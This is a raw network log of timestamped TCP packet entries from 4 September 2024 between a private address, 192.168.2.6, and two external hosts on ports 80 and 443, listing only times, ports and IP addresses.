Sep 4, 2024 17:37:09.554358959 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554362059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554379940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554379940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554390907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554399967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554400921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554409981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554419041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554423094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554429054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554439068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554440022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554457903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554471970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554519892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554529905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554538965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554548979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554558039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554559946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554569006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554579020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554591894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554621935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554650068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554665089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554673910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554682016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554686069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554692984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554702997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554702997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554711103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554730892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555370092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555401087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555409908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555414915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555428028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555447102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555500031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555510998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555520058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555530071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555538893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555542946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555547953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555565119 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555583954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555608988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555619001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555627108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555651903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555680037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555696011 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555706024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555713892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555735111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555753946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555845022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555855989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555864096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555880070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555891037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555892944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555892944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555900097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555912018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555912971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555922031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555929899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555933952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555942059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555944920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.555978060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555978060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.555994034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556005001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556013107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556021929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556030989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556032896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556054115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556066990 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556133986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556144953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556154013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556164026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556180954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556190968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556240082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556253910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556263924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556273937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556282043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556293011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556318998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556374073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556384087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556392908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556401968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556411028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556418896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556421995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556432962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556440115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556442976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556452990 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556452990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556464911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556499958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556507111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556518078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556525946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556535006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556545973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556555033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556565046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556565046 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556576014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556586981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556590080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556597948 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556608915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556612015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556634903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556653976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.556685925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556696892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.556732893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613581896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613593102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613604069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613626957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613629103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613645077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613652945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613656998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613670111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613683939 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613698006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613723040 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613774061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613785028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613794088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613805056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613814116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613816023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613827944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613831997 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613840103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613851070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613883972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613923073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613965988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.613980055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.613991976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.614001036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.614012003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.614016056 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.614022970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.614023924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.614036083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.614046097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.614072084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629354954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629364014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629373074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629415035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629415989 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629426956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629436016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629445076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629446030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629470110 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629488945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629514933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629523993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629533052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629540920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629548073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629555941 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629580975 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629599094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629610062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629618883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629625082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629625082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629657030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629683018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629693031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629719973 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629740953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629753113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629764080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629772902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629784107 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629796982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629798889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629811049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629847050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629853964 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629853964 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629863024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629873037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629906893 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629915953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629925013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.629946947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.629964113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630094051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630103111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630111933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630120993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630130053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630131006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630141020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630150080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630153894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630160093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630166054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630171061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630183935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630183935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630204916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630235910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630289078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630312920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630323887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630326033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630333900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630351067 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630372047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630510092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630521059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630531073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630541086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630549908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630549908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630557060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630563021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630573988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630582094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630583048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630594015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630594969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630608082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630619049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630640030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630718946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630728006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630737066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630747080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630757093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630759001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630765915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630795956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630821943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630834103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630842924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630852938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630861998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630861998 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630872965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630872965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630883932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.630902052 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630908012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.630928993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631078959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631091118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631099939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631109953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631119013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631120920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631127119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631129980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631141901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631150961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631156921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631179094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631179094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631408930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631427050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631438017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631445885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631448984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631454945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631464958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631469011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631477118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631485939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631491899 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631496906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631501913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631506920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631515980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631525040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631534100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631536007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631544113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631551981 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631571054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631572008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631591082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631694078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631716013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631726980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631731987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631735086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.631753922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631763935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.631772995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.632253885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.632272005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.632281065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.632297993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.632311106 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.632316113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.632356882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.632368088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.632376909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.632388115 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.632390976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.632407904 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.632432938 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.632436037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.632469893 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.633569956 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.633584976 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.633622885 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.633640051 CEST	443	49727	158.69.225.124	192.168.2.6
